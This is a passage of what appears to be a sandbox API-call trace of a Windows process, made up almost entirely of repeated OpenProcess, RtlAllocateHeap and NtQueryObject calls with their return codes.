OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.543] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.543] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.543] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.543] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.544] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.544] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.544] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.545] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.546] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.546] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.546] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.546] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.547] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.548] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.549] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.549] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.550] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.550] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.574] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.575] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.575] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.575] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.576] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.576] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.576] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.576] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.576] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.577] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.578] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.579] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e40850 [0114.580] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x4c, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.580] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.581] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.582] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.582] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, 